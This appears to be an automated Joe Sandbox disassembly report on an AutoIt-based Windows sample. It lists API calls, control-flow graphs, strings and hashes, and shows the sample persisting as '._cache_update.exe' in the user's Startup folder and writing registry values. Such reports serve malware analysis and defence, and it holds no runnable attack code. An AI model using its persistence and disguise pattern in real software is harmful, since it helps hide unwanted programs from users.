                                                                                                                                                                  • Opcode Fuzzy Hash: 2d0b2f160460cfb2c8ae6b89adb7412837d4a457e084768d0ac5e923490f3c4b
                                                                                                                                                                  • Instruction Fuzzy Hash: 28518DB1414340EBCB04EF59FC89C9AB7E8FB5A300B40495EF945832A1EB74965CCF66

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,00000000,00000001,00000000), ref: 001E428C
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                    • Part of subcall function 00201BC7: __wcsicmp_l.LIBCMT ref: 00201C50
                                                                                                                                                                  • _wcscpy.LIBCMT ref: 001E43C0
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0025214E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe$CMDLINE$CMDLINERAW
                                                                                                                                                                  • API String ID: 861526374-1727565619
                                                                                                                                                                  • Opcode ID: 3c902a9e3cbb69a06b897d5db074abc5b5acff74c80a6377620641048aa93191
                                                                                                                                                                  • Instruction ID: df75208a7a92071167f6f3092f90e0973620e9dab17482a2199bac3d190ef213
                                                                                                                                                                  • Opcode Fuzzy Hash: 3c902a9e3cbb69a06b897d5db074abc5b5acff74c80a6377620641048aa93191
                                                                                                                                                                  • Instruction Fuzzy Hash: 48819C72900659ABCB04EBE1DC56EEFB7B8AF25360F200015F505B7082EF706B19CBA1

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 983 2278ee-227911 WSAStartup 984 2279b1-2279bd call 201943 983->984 985 227917-227938 gethostname gethostbyname 983->985 994 2279be-2279c1 984->994 985->984 986 22793a-227941 985->986 988 227943 986->988 989 22794e-227950 986->989 991 227945-22794c 988->991 992 227952-22795f call 201943 989->992 993 227961-2279a6 call 1ffaa0 inet_ntoa call 203220 call 228553 call 201943 call 20017e 989->993 991->989 991->991 999 2279a9-2279af WSACleanup 992->999 993->999 999->994
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                  • String ID: 0.0.0.0
                                                                                                                                                                  • API String ID: 208665112-3771769585
                                                                                                                                                                  • Opcode ID: 3328f0f2503aee9f5781672c10d5722e164af92dd1b343b0e7d06e8cf2be6cee
                                                                                                                                                                  • Instruction ID: e2b54a07d957b365278940b5d9c9536e7c40fee30b83ce66a4dcc2b1c2ad6827
                                                                                                                                                                  • Opcode Fuzzy Hash: 3328f0f2503aee9f5781672c10d5722e164af92dd1b343b0e7d06e8cf2be6cee
                                                                                                                                                                  • Instruction Fuzzy Hash: C4110D31A18229BFDB25ABB0EC4AEDE777CEF05720F004065F44596091EFB0DBE18A51

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 1008 24352a-243569 call 1ed3d2 * 3 1015 243574-2435e7 call 1e84a6 call 243d7b call 243af7 1008->1015 1016 24356b-24356e 1008->1016 1030 243612-243617 1015->1030 1031 2435e9-2435f4 call 22d7e4 1015->1031 1016->1015 1017 2435f9-24360d call 1f2570 1016->1017 1023 243a94-243ab7 call 1e5cd3 * 3 1017->1023 1032 24366d 1030->1032 1033 243619-24362e RegConnectRegistryW 1030->1033 1031->1017 1039 243671-24369c RegCreateKeyExW 1032->1039 1036 243667-24366b 1033->1036 1037 243630-243662 call 1e7ba9 call 22d7e4 call 1f2570 1033->1037 1036->1039 1037->1023 1042 2436e7-2436ec 1039->1042 1043 24369e-2436d2 call 1e7ba9 call 22d7e4 call 1f2570 1039->1043 1045 2436f2-243715 call 1e84a6 call 201bc7 1042->1045 1046 243a7b-243a8c 1042->1046 1043->1023 1065 2436d8-2436e2 1043->1065 1063 243796-2437b6 call 1e84a6 call 201bc7 1045->1063 1064 243717-24376d call 1e84a6 call 2018fb call 1e84a6 * 2 1045->1064 1046->1023 1058 243a8e 1046->1058 1058->1023 1075 243840-243860 call 1e84a6 call 201bc7 1063->1075 1076 2437bc-243814 call 1e84a6 call 2018fb call 1e84a6 * 2 RegSetValueExW 1063->1076 1064->1046 1096 243773-243791 call 1e7ba9 call 1f2570 1064->1096 1065->1023 1089 243866-2438c9 call 1e84a6 call 20010a call 1e84a6 call 1e3b1e 1075->1089 1090 243949-243969 call 1e84a6 call 201bc7 1075->1090 1076->1046 1107 24381a-24383b call 1e7ba9 call 1f2570 1076->1107 1129 2438e9-243918 call 1e84a6 1089->1129 1130 2438cb-2438d0 1089->1130 1109 2439c6-2439e6 call 1e84a6 call 201bc7 1090->1109 1110 24396b-24398b call 1ecdb4 call 1e84a6 1090->1110 1118 243a74 1096->1118 1107->1046 1132 243a13-243a30 call 1e84a6 call 201bc7 1109->1132 1133 2439e8-243a0e call 1ed00b call 1e84a6 1109->1133 1134 24398d-2439a1 1110->1134 1118->1046 1149 24393d-243944 call 20017e 1129->1149 1150 24391a-243936 call 1e7ba9 call 1f2570 1129->1150 1135 
2438d2-2438d4 1130->1135 1136 2438d8-2438db 1130->1136 1154 243a67-243a71 call 1f2570 1132->1154 1155 243a32-243a60 call 22be47 call 1e84a6 call 22be8a 1132->1155 1133->1134 1134->1046 1147 2439a7-2439c1 call 1e7ba9 call 1f2570 1134->1147 1135->1136 1136->1130 1137 2438dd-2438df 1136->1137 1137->1129 1141 2438e1-2438e5 1137->1141 1141->1129 1147->1118 1149->1046 1150->1149 1154->1118 1155->1154
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00243626
                                                                                                                                                                  • RegCreateKeyExW.KERNEL32(?,?,00000000,0027DBF0,00000000,?,00000000,?,?), ref: 00243694
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConnectCreateRegistry
                                                                                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                  • API String ID: 4192528855-966354055
                                                                                                                                                                  • Opcode ID: 81b48be5976d28e368fafd78079178472982dbb740fede52c36d5395953b5f4b
                                                                                                                                                                  • Instruction ID: a38f94b3f30f8365a52e27495b187db72f0309276e1594acbf6694ee8d017108
                                                                                                                                                                  • Opcode Fuzzy Hash: 81b48be5976d28e368fafd78079178472982dbb740fede52c36d5395953b5f4b
                                                                                                                                                                  • Instruction Fuzzy Hash: DF024A75610A129FCB14EF25C895E2AB7E5FF89720F05845DF88A9B3A2DB30ED11CB41

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 001E30B0
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 001E30BF
                                                                                                                                                                  • LoadIconW.USER32(00000063), ref: 001E30D5
                                                                                                                                                                  • LoadIconW.USER32(000000A4), ref: 001E30E7
                                                                                                                                                                  • LoadIconW.USER32(000000A2), ref: 001E30F9
                                                                                                                                                                    • Part of subcall function 001E318A: LoadImageW.USER32(001E0000,00000063,00000001,00000010,00000010,00000000), ref: 001E31AE
                                                                                                                                                                  • RegisterClassExW.USER32(?), ref: 001E3167
                                                                                                                                                                    • Part of subcall function 001E2F58: GetSysColorBrush.USER32(0000000F), ref: 001E2F8B
                                                                                                                                                                    • Part of subcall function 001E2F58: RegisterClassExW.USER32(00000030), ref: 001E2FB5
                                                                                                                                                                    • Part of subcall function 001E2F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 001E2FC6
                                                                                                                                                                    • Part of subcall function 001E2F58: LoadIconW.USER32(000000A9), ref: 001E3009
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                                                                                                                  • String ID: #$0$AutoIt v3
                                                                                                                                                                  • API String ID: 2880975755-4155596026
                                                                                                                                                                  • Opcode ID: 0db013c7f947fcec5998e998f752187bf06e6c310284f3e0b3d986b14d7614a5
                                                                                                                                                                  • Instruction ID: 002ce8d2a819c7a4d10937b5074a39d06fd7d552c52491abc65e1dd551a205a2
                                                                                                                                                                  • Opcode Fuzzy Hash: 0db013c7f947fcec5998e998f752187bf06e6c310284f3e0b3d986b14d7614a5
                                                                                                                                                                  • Instruction Fuzzy Hash: 072133B4E04358ABCB01DFA9FC4DA9DBBF5FB49320F00812AE618A32A0DB7545548F95

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0023B777
                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0023B7A4
                                                                                                                                                                  • CoUninitialize.COMBASE ref: 0023B7AE
                                                                                                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 0023B8AE
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 0023B9DB
                                                                                                                                                                  • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 0023BA0F
                                                                                                                                                                  • CoGetObject.OLE32(?,00000000,0026D91C,?), ref: 0023BA32
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 0023BA45
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0023BAC5
                                                                                                                                                                  • VariantClear.OLEAUT32(0026D91C), ref: 0023BAD5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2395222682-0
                                                                                                                                                                  • Opcode ID: 875c452f1e3ab9ee811a934d7621e788951e70ca69e0bba54ad575fffab30ae8
                                                                                                                                                                  • Instruction ID: 5b858d018bcb74d95a9a372ab20d4206a517276e9a6477c6e2b2982b842bc979
                                                                                                                                                                  • Opcode Fuzzy Hash: 875c452f1e3ab9ee811a934d7621e788951e70ca69e0bba54ad575fffab30ae8
                                                                                                                                                                  • Instruction Fuzzy Hash: 6EC115B16143059FC701DF68C884A6BB7E9FF89308F00495DFA8A9B251DB71ED16CB92

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 001E2F8B
                                                                                                                                                                  • RegisterClassExW.USER32(00000030), ref: 001E2FB5
                                                                                                                                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 001E2FC6
                                                                                                                                                                  • LoadIconW.USER32(000000A9), ref: 001E3009
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                  • API String ID: 975902462-1005189915
                                                                                                                                                                  • Opcode ID: abd0246c6cf172bf176f1e40dd7265e9b01a0f999d14c8f4096d5d54d4df34bb
                                                                                                                                                                  • Instruction ID: 9bd3a24bcaf6c0666b7246d5abb4a1617125fc11d33a28c5162477031123d559
                                                                                                                                                                  • Opcode Fuzzy Hash: abd0246c6cf172bf176f1e40dd7265e9b01a0f999d14c8f4096d5d54d4df34bb
                                                                                                                                                                  • Instruction Fuzzy Hash: 0D21BFB5E00318AFEB009FA5E88DBCEBBB4FB09710F00811AF615A62A0DBB54554CF91

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 002423E6
                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00242579
                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0024259D
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002425DD
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002425FF
                                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00242760
                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00242792
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 002427C1
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00242838
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4090791747-0
                                                                                                                                                                  • Opcode ID: 2490bc5997333b1935f5a33e029582c985d94ee223b18c33dd4a5d38389ad4c8
                                                                                                                                                                  • Instruction ID: 987bcb0e4d70bd42c444cb5267486a3a503624bb426ba603481052f633d1ef12
                                                                                                                                                                  • Opcode Fuzzy Hash: 2490bc5997333b1935f5a33e029582c985d94ee223b18c33dd4a5d38389ad4c8
                                                                                                                                                                  • Instruction Fuzzy Hash: 1FD1BB31614341DFC718EF26C891B6EBBE1AF85310F14845DF8899B2A2DB70EC55CB52

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                  • API String ID: 0-572801152
                                                                                                                                                                  • Opcode ID: bbe0e49d9db48900c2f0e3e5b76ae90fcf0bcd70c73cfe65831fa4545f0f4789
                                                                                                                                                                  • Instruction ID: 95533afe616cba3690baea3efdc2610f2fa7febc8355bbc57a22ae9e85fb2bea
                                                                                                                                                                  • Opcode Fuzzy Hash: bbe0e49d9db48900c2f0e3e5b76ae90fcf0bcd70c73cfe65831fa4545f0f4789
                                                                                                                                                                  • Instruction Fuzzy Hash: 7DE1D4B1A2021AAFDF10DFA4D885BAEB7B5FF48314F248429F945BB281D7709D61CB50

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$ClearInit$_memset
                                                                                                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                  • API String ID: 2862541840-625585964
                                                                                                                                                                  • Opcode ID: c1dead9aa01bd29041b51227c123fbc415529d72284d687cf7160627cd454d08
                                                                                                                                                                  • Instruction ID: 25ea882710c5a394e0f05e52d0f14e2effee18b6568df76fb8d23149bc63232b
                                                                                                                                                                  • Opcode Fuzzy Hash: c1dead9aa01bd29041b51227c123fbc415529d72284d687cf7160627cd454d08
                                                                                                                                                                  • Instruction Fuzzy Hash: 2E917FB1A2021AABDF24DFA4DC44FAFB7B8AF45710F208119F919BB241D7709955CFA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001E2ECB
                                                                                                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001E2EEC
                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 001E2F00
                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 001E2F09
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$CreateShow
                                                                                                                                                                  • String ID: AutoIt v3$edit
                                                                                                                                                                  • API String ID: 1584632944-3779509399
                                                                                                                                                                  • Opcode ID: 6318be21472bf8e540bc0294f0ea969c8c076952dfc3c1a8ed2f07d4929c7229
                                                                                                                                                                  • Instruction ID: 7b630763d009c725b16428678b338c43bcd0cac0216926531bd76836d54be858
                                                                                                                                                                  • Opcode Fuzzy Hash: 6318be21472bf8e540bc0294f0ea969c8c076952dfc3c1a8ed2f07d4929c7229
                                                                                                                                                                  • Instruction Fuzzy Hash: 00F0BD71A502E47BD7215757BC4CE673E7DE7C7F20F01411AFE08921A0D96108A5DA71
                                                                                                                                                                  APIs
                                                                                                                                                                  • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00239409
                                                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00239416
                                                                                                                                                                  • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0023943A
                                                                                                                                                                  • _strlen.LIBCMT ref: 00239484
                                                                                                                                                                  • _memmove.LIBCMT ref: 002394CA
                                                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 002394F7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2795762555-0
                                                                                                                                                                  • Opcode ID: 3449dd4f6f86919003c97ebb61c4ac5c101e8530e45d02ba53e028b68811ee50
                                                                                                                                                                  • Instruction ID: 067a8f6af3eb95d56bc7ca7a987b27d5f99b4e93c65ccb096cdd0fef972b1003
                                                                                                                                                                  • Opcode Fuzzy Hash: 3449dd4f6f86919003c97ebb61c4ac5c101e8530e45d02ba53e028b68811ee50
                                                                                                                                                                  • Instruction Fuzzy Hash: 8041C6B1A10208AFCB04EFA4DC85EAEB7BDEF59310F108169F516972D2DB709E51CB60
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,001FEADA,?,?), ref: 001FEB27
                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,001FEADA,?,?), ref: 00254B26
                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,001FEADA,?,?), ref: 00254B65
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
